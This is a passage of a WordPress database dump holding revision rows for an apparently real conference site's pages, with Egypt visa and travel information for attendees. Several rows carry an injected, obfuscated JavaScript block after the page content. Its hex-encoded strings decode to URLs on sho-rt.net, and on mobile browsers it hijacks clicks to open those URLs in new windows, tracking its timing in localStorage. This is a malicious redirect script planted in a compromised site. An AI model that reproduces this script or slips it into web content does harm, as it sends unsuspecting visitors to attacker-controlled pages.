_0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-01 08:48:17','2023-06-01 08:48:17','',3066,'https://gsw2023.com/?p=4605',0,'revision','',0),
(4606,1,'2023-06-01 08:58:27','2023-06-01 08:58:27','<p>[vc_row][vc_column][vc_column_text]</p>\n<p style=\"font-weight: 400;\"><strong>Entry Visa:</strong></p>\n<ul style=\"font-weight: 400;\">\n<li>For participants requiring visa invitation letters, please use the link below :</li>\n</ul>\n<p style=\"font-weight: 400;\"><span style=\"color: #808080;\"><strong><a style=\"color: #808080;\" href=\"mailto:GSW-visa@gsw2023.com\">https://visa.gsw2023.com</a></strong></span>.  You will receive an invitation letter automatically once you provide your name (as it appears in your passport), passport number and nationality.</p>\n<ul style=\"font-weight: 400;\">\n<li>If you require specific format for the Visa Letter, please Send email to <strong><span style=\"color: #808080;\"><a style=\"color: #808080;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span></strong> to edit/add the text of the letter.</li>\n</ul>\n<p>&nbsp;</p>\n<ul style=\"font-weight: 400;\">\n<li>For most nationalities, reciving a visa for Egypt can be done on arrival at Cairo International Airport or online via the Egyptian Government\'s official e-visa portal <span style=\"color: #808080;\"><strong>(<a style=\"color: #808080;\" href=\"https://visa2egypt.gov.eg/eVisa/Home?VISTK=OA4K-0JST-POSC-FLL7-FEVD-OUJ5-QIZH-78YZ-GYQ9-9IQQ-K5BB-E03R-EOBW-KVT6-S9CK-X3W9\" data-saferedirecturl=\"https://www.google.com/url?q=https://visa2egypt.gov.eg/eVisa/Home?VISTK%3DOA4K-0JST-POSC-FLL7-FEVD-OUJ5-QIZH-78YZ-GYQ9-9IQQ-K5BB-E03R-EOBW-KVT6-S9CK-X3W9&amp;source=gmail&amp;ust=1685249456207000&amp;usg=AOvVaw3sDw0ljxu0W2nRhsTa3oTm\">https://visa2egypt.gov.eg/eVisa/Home?VISTK=OA4K-0JST-POSC-FLL7-FEVD-OUJ5-QIZH-78YZ-GYQ9-9IQQ-K5BB-E03R-EOBW-KVT6-S9CK-X3W9</a>)</strong></span>. Nationals of the countries listed below may be issued with an e-Visa upon application on the Egypt e-Visa Portal</li>\n</ul>\n<p style=\"font-weight: 400;\"><strong> </strong></p>\n<table style=\"font-weight: 400;\" width=\"1088\">\n<tbody>\n<tr>\n<td>Albania</td>\n<td>Argentina</td>\n<td>Armenia</td>\n<td>Australia</td>\n</tr>\n<tr>\n<td>Austria</td>\n<td>Azerbaijan</td>\n<td>Bahrain</td>\n<td>Belarus</td>\n</tr>\n<tr>\n<td>Belgium</td>\n<td>Bolivia</td>\n<td>Bosnia and Herzegovina</td>\n<td>Brazil</td>\n</tr>\n<tr>\n<td>Bulgaria</td>\n<td>Canada</td>\n<td>Chile</td>\n<td>China</td>\n</tr>\n<tr>\n<td>China/Hong Kong</td>\n<td>China/Taiwan</td>\n<td>Colombia</td>\n<td>Croatia</td>\n</tr>\n<tr>\n<td>Cyprus</td>\n<td>Czech</td>\n<td>Denmark</td>\n<td>Ecuador</td>\n</tr>\n<tr>\n<td>Estonia</td>\n<td>Finland</td>\n<td>France</td>\n<td>Georgia</td>\n</tr>\n<tr>\n<td>Germany</td>\n<td>Greece</td>\n<td>Hungary</td>\n<td>Iceland</td>\n</tr>\n<tr>\n<td>India</td>\n<td>Ireland</td>\n<td>Italy</td>\n<td>Japan</td>\n</tr>\n<tr>\n<td>Kazakhstan</td>\n<td>Korea (South)</td>\n<td>Kuwait</td>\n<td>Latvia</td>\n</tr>\n<tr>\n<td>Lithuania</td>\n<td>Luxembourg</td>\n<td>Macedonia</td>\n<td>Malaysia</td>\n</tr>\n<tr>\n<td>Malta</td>\n<td>Mexico</td>\n<td>Moldova</td>\n<td>Monaco</td>\n</tr>\n<tr>\n<td>Montenegro</td>\n<td>Netherlands</td>\n<td>New Zealand</td>\n<td>Norway</td>\n</tr>\n<tr>\n<td>Oman</td>\n<td>Paraguay</td>\n<td>Peru</td>\n<td>Poland</td>\n</tr>\n<tr>\n<td>Portugal</td>\n<td>Qatar</td>\n<td>Republic of Kosovo</td>\n<td>Romania</td>\n</tr>\n<tr>\n<td>Russian Federation</td>\n<td>San Marino</td>\n<td>Saudi Arabia</td>\n<td>Serbia</td>\n</tr>\n<tr>\n<td>Singapore</td>\n<td>Slovakia</td>\n<td>Slovenia</td>\n<td>South Africa</td>\n</tr>\n<tr>\n<td>Spain</td>\n<td>Sweden</td>\n<td>Switzerland</td>\n<td>Ukraine</td>\n</tr>\n<tr>\n<td>United Arab Emirates</td>\n<td>United Kingdom (England, Northern Ireland, Scotland and Wales)</td>\n<td>United States of America</td>\n<td>Uruguay</td>\n</tr>\n<tr>\n<td>Vatican</td>\n<td>Venezuela</td>\n<td></td>\n<td></td>\n</tr>\n</tbody>\n</table>\n<p style=\"font-weight: 400;\"><strong> </strong></p>\n<ul style=\"font-weight: 400;\">\n<li>Weather: in September: Around 25-30 degree in Cairo</li>\n<li>Cairo is reachable from over 70 countries through Egypt Air and Star Alliance members. The local organizing committee arranged for additional discount on air tickets from Egypt Air (Star Alliance). Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to: <strong><span style=\"color: #808080;\"><a style=\"color: #808080;\" href=\"mailto:GSW-EGYPTAIR@gsw2023.com\">GSW-EGYPTAIR@gsw2023.com</a></span></strong></li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Travel To Egypt','','inherit','closed','closed','','2675-revision-v1','','','2023-06-01 08:58:27','2023-06-01 08:58:27','',2675,'https://gsw2023.com/?p=4606',0,'revision','',0),
(4607,1,'2023-06-01 08:58:58','2023-06-01 08:58:58','<p>[vc_row][vc_column][vc_column_text]</p>\n<p style=\"font-weight: 400;\"><strong>Entry Visa:</strong></p>\n<ul style=\"font-weight: 400;\">\n<li>For participants requiring visa invitation letters, please use the link below :</li>\n</ul>\n<p style=\"font-weight: 400;\"><span style=\"color: #808080;\"><strong><a style=\"color: #808080;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">https://visa.gsw2023.com</a></strong></span>.  You will receive an invitation letter automatically once you provide your name (as it appears in your passport), passport number and nationality.</p>\n<ul style=\"font-weight: 400;\">\n<li>If you require specific format for the Visa Letter, please Send email to <strong><span style=\"color: #808080;\"><a style=\"color: #808080;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span></strong> to edit/add the text of the 